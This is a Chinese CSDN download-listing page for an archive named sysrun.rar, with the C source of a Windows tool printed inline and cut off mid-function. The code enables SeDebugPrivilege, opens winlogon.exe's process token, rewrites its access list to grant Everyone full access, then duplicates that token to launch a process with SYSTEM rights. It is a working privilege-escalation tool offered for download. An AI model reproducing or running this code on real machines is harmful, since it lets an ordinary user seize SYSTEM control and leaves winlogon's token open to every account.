sysrun.rar_C提升权限_sysrun_sysrun_提升权限_提升进程权限资源-CSDN文库

共3个文件

c：1个

exe：1个

txt：1个

版权申诉

提升权限

提升进程权限

87 浏览量 2022-09-23 23:23:58 上传评论收藏 19KB RAR 举报

资源推荐

资源详情

资源评论

收起资源包目录

sysrun.rar （3个子文件）

sysrun.c 9KB

sysrun.exe 40KB

www.pudn.com.txt 218B

sysrun.c cl sysrun.cpp Shlwapi.lib advapi32.lib #include <stdio.h> #include <windows.h> #include <tlhelp32.h> #include <shlwapi.h> #include <aclapi.h> #pragma comment(lib,"Shlwapi.lib") BOOL EnableDebugPriv(LPCTSTR szPrivilege) { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &hToken)) { return FALSE; } if (!LookupPrivilegeValue(NULL, szPrivilege, &sedebugnameValue)) { CloseHandle(hToken); return FALSE; } tkp.PrivilegeCount = 1; tkp.Privileges[0].Luid = sedebugnameValue; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL)) { CloseHandle(hToken); return FALSE; } return TRUE; } DWORD GetProcessId(LPCTSTR szProcName) { PROCESSENTRY32 pe; DWORD dwPid; DWORD dwRet; BOOL bFound = FALSE; HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSP) { pe.dwSize = sizeof(pe); for (dwRet = Process32First(hSP, &pe); dwRet; dwRet = Process32Next(hSP, &pe)) { if (StrCmpNI(szProcName, pe.szExeFile, strlen(szProcName)) == 0) { dwPid = pe.th32ProcessID; bFound = TRUE; break; } } CloseHandle(hSP); if (bFound == TRUE) { return dwPid; } } return NULL; } BOOL CreateSystemProcess(LPTSTR szProcessName) { HANDLE hProcess; HANDLE hToken, hNewToken; DWORD dwPid; PACL pOldDAcl = NULL; PACL pNewDAcl = NULL; BOOL bDAcl; BOOL bDefDAcl; DWORD dwRet; PACL pSacl = NULL; PSID pSidOwner = NULL; PSID pSidPrimary = NULL; DWORD dwAclSize = 0; DWORD dwSaclSize = 0; DWORD dwSidOwnLen = 0; DWORD dwSidPrimLen = 0; DWORD dwSDLen; EXPLICIT_ACCESS ea; PSECURITY_DESCRIPTOR pOrigSd = NULL; PSECURITY_DESCRIPTOR pNewSd = NULL; STARTUPINFO si; PROCESS_INFORMATION pi; BOOL bRet = true; if (!EnableDebugPriv("SeDebugPrivilege")) { printf("EnableDebugPriv() failed!\n"); bRet = false; goto Cleanup; } if ((dwPid = GetProcessId("WINLOGON.EXE")) == NULL) { printf("GetProcessId() failed!\n"); bRet = false; goto Cleanup; } hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid); if (hProcess == NULL) { printf("OpenProcess() = %d\n", GetLastError() ); bRet = false; goto Cleanup; } if (!OpenProcessToken( hProcess, READ_CONTROL|WRITE_DAC, &hToken )) { printf("OpenProcessToken() = %d\n", GetLastError()); bRet = false; goto Cleanup; } ZeroMemory(&ea, sizeof( EXPLICIT_ACCESS)); BuildExplicitAccessWithName(&ea, "Everyone", TOKEN_ALL_ACCESS, GRANT_ACCESS, 0); if (!GetKernelObjectSecurity(hToken, DACL_SECURITY_INFORMATION, pOrigSd, 0, &dwSDLen)) { if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) { pOrigSd = (PSECURITY_DESCRIPTOR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSDLen); if (pOrigSd == NULL) { printf("HeapAlloc failed: pSd \n"); bRet = false; goto Cleanup; } if (!GetKernelObjectSecurity(hToken, DACL_SECURITY_INFORMATION, pOrigSd, dwSDLen, &dwSDLen)) { printf("GetKernelObjectSecurity() = %d\n", GetLastError()); bRet = false; goto Cleanup; } } else { printf("GetKernelObjectSecurity() = %d\n", GetLastError()); bRet = false; goto Cleanup; } } if (!GetSecurityDescriptorDacl(pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl)) { printf("GetSecurityDescriptorDacl() = %d\n", GetLastError()); bRet = false; goto Cleanup; } dwRet = SetEntriesInAcl(1, &ea, pOldDAcl, &pNewDAcl); if (dwRet != ERROR_SUCCESS) { printf("SetEntriesInAcl() = %d\n", GetLastError()); pNewDAcl = NULL; bRet = false; goto Cleanup; } if (!MakeAbsoluteSD(pOrigSd, pNewSd, &dwSDLen, pOldDAcl, &dwAclSize, pSacl, &dwSaclSize, pSidOwner, &dwSidOwnLen, pSidPrimary, &dwSidPrimLen)) { if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) { pOldDAcl = (PACL) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwAclSize); pSacl = (PACL) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSaclSize); pSidOwner = (PSID) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSidOwnLen); pSidPrimary = (PSID) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSidPrimLen); pNewSd = (PSECURITY_DESCRIPTOR) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSDLen); if (pOldDAcl == NULL|| pSacl == NULL|| pSidOwner == NULL|| pSidPrimary == NULL|| pNewSd == NULL ) { printf("HeapAlloc SID or ACL failed!\n"); bRet = false; goto Cleanup; } if (!MakeAbsoluteSD(pOrigSd, pNewSd, &dwSDLen, pOldDAcl, &dwAclSize, pSacl, &dwSaclSize, pSidOwner, &dwSidOwnLen, pSidPrimary, &dwSidPrimLen)) { printf("MakeAbsoluteSD() = %d\n", GetLastError()); bRet = false; goto Cleanup; } } else { printf("MakeAbsoluteSD() = %d\n", GetLastError()); bRet = false; goto Cleanup; } } if (!SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl)) { printf("SetSecurityDescriptorDacl() = %d\n", GetLastError()); bRet = false; goto Cleanup; } if (!SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd)) { printf("SetKernelObjectSecurity() = %d\n", GetLastError()); bRet = false; goto Cleanup; } if (!OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken)) { printf("OpenProcessToken() = %d\n", GetLastError()); bRet = false; goto Cleanup; } if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken)) { printf("DuplicateTokenEx() = %d\n", GetLastError()); bRet = false; goto Cleanup; } ZeroMemory(&si, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); ImpersonateLoggedOnUser(hNewToken); if (!CreateProcessAsUser(hNewToken, NULL, szProcessName,

评论收藏

内容反馈

版权申诉